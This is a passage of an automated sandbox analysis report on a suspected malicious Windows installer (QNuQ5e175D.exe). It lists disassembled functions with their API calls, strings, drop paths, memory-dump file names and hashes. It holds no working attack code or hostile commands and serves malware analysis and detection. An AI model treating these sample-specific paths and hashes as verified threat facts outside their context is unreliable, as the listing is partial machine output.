                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres
                                                          • API String ID: 542301482-2593783087
                                                          • Opcode ID: 99423ef168fa0dc7d563ab215b90f00d26a2448a52d76e49bcb10065e06d2d2e
                                                          • Instruction ID: 879178e2914a864b6efeea5842d2d3985b85c893096dfa9a9f6c7732eb85e553
                                                          • Opcode Fuzzy Hash: 99423ef168fa0dc7d563ab215b90f00d26a2448a52d76e49bcb10065e06d2d2e
                                                          • Instruction Fuzzy Hash: D1412571A00209AFCB00DFE4CA89A9D7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                          Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                          • Instruction ID: 26e9208e2aa2ebd90a7e98889f3239c7d6ed4a815a584e9a2b1206afb1357c73
                                                          • Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                          • Instruction Fuzzy Hash: D1F08C71A04105AAD700EBE4EE499AEB378EF14324F20017BE112F31E5D7B89E509B2E
                                                          Function 00406DE6 Relevance: .3, Instructions: 334COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                          • Instruction ID: 02047a1f5ab1e1ae91636e32b2ea393de8a2dfbdc7c3bc720fead707395ef2b6
                                                          • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                          • Instruction Fuzzy Hash: 74E19A71A0470ADFCB24CF58C890BAABBF5FF44305F15852EE496A72D1E738AA51CB05
                                                          Function 004075BD Relevance: .3, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                          • Instruction ID: 0a97e2f3c77d8a3c51360fc4da6bbcda8fc4cde0dfaec3b210e24d05d93e5961
                                                          • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                          • Instruction Fuzzy Hash: 46C14872E042198BCF18DF68C4905EEB7B2BF88354F25866AD856B7380D734A942CF95
                                                          Function 00404F63 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F7B
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404F86
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FD0
                                                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FE7
                                                          • SetWindowLongW.USER32(?,000000FC,00405570), ref: 00405000
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00405014
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405026
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 0040503C
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405048
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040505A
                                                          • DeleteObject.GDI32(00000000), ref: 0040505D
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405088
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405094
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040512F
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040515F
                                                            • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405173
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004051A1
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004051AF
                                                          • ShowWindow.USER32(?,00000005), ref: 004051BF
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 004052BA
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040531F
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405334
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405358
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405378
                                                          • ImageList_Destroy.COMCTL32(?), ref: 0040538D
                                                          • GlobalFree.KERNEL32(?), ref: 0040539D
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004054BF
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054CE
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054F9
                                                          • ShowWindow.USER32(?,00000000), ref: 00405547
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405552
                                                          • ShowWindow.USER32(00000000), ref: 00405559
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                          • Instruction ID: 2b71226c2ce540754c325362a134889399d6c5c4637dca841463e5b600fa6882
                                                          • Opcode Fuzzy Hash: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                          • Instruction Fuzzy Hash: 8802AD70900608AFDF20DFA8DD85AAF7BB5FB45314F10817AE611BA2E1D7798A41CF58
                                                          Function 004046B5 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 204windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404753
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404767
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404784
                                                          • GetSysColor.USER32(?), ref: 00404795
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004047A3
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004047B1
                                                          • lstrlenW.KERNEL32(?), ref: 004047B6
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047C3
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047D8
                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404831
                                                          • SendMessageW.USER32(00000000), ref: 00404838
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404863
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004048A6
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004048B4
                                                          • SetCursor.USER32(00000000), ref: 004048B7
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004048D0
                                                          • SetCursor.USER32(00000000), ref: 004048D3
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404902
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404914
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: ,F@$<c$Call$N
                                                          • API String ID: 3103080414-4250413633
                                                          • Opcode ID: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                          • Instruction ID: ccb0ec9a7d9d767aff215416cd1a2e620de701fb5c4a8d8609e67ea5798c0c5e
                                                          • Opcode Fuzzy Hash: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                          • Instruction Fuzzy Hash: 046192F1900209BFDB10AF64DD85EAA7B69FB84315F00853AFB05B65E0C778A951CF98
                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                          • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                          • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                          • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                          Function 004061BD Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406358,?,?), ref: 004061F8
                                                          • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 00406201
                                                            • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                            • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                          • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 0040621E
                                                          • wsprintfA.USER32 ref: 0040623C
                                                          • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406277
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406286
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004062BE
                                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406314
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406325
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040632C
                                                            • Part of subcall function 00406067: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                            • Part of subcall function 00406067: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                          • Instruction ID: 21ba76f912769f78f8e3df01d85e3e27af82f360ac84a16f7af8f01611abcd2b
                                                          • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                          • Instruction Fuzzy Hash: 66314330240325BBD2206B659D48F6B3B6CDF45708F16043EFD42B62C2DA3C982486BD
                                                          Function 00406825 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\QNuQ5e175D.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                          • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406826
                                                          • *?|<>/":, xrefs: 00406877
                                                          • "C:\Users\user\Desktop\QNuQ5e175D.exe", xrefs: 00406869
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-1861573198
                                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction ID: bedb2e6347f460b6a244a356934bd0223db9426f0f89d28790e15ec7ef568a4f
                                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction Fuzzy Hash: C911B66780221295DB303B148C40A7762A8AF59754F56C43FED86732C0E77C5C9282AD
                                                          Function 0040455D Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040457A
                                                          • GetSysColor.USER32(00000000), ref: 004045B8
                                                          • SetTextColor.GDI32(?,00000000), ref: 004045C4
                                                          • SetBkMode.GDI32(?,?), ref: 004045D0
                                                          • GetSysColor.USER32(?), ref: 004045E3
                                                          • SetBkColor.GDI32(?,?), ref: 004045F3
                                                          • DeleteObject.GDI32(?), ref: 0040460D
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404617
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction ID: 3bf72a8e0ffa46ee4049c610ab3cabbd6d50cfb344f29d4a8179c655b9565abb
                                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction Fuzzy Hash: 5C2165B1500B04ABC7319F38DE08B577BF4AF41715F04892EEA96A26E0D739D944CB54
                                                          Function 6FC42480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC425C2
                                                            • Part of subcall function 6FC412CC: lstrcpynW.KERNEL32(00000000,?,6FC4137F,00000019,6FC411CA,-000000A0), ref: 6FC412DC
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 6FC42548
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FC42563
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID: @Hmu
                                                          • API String ID: 4216380887-887474944
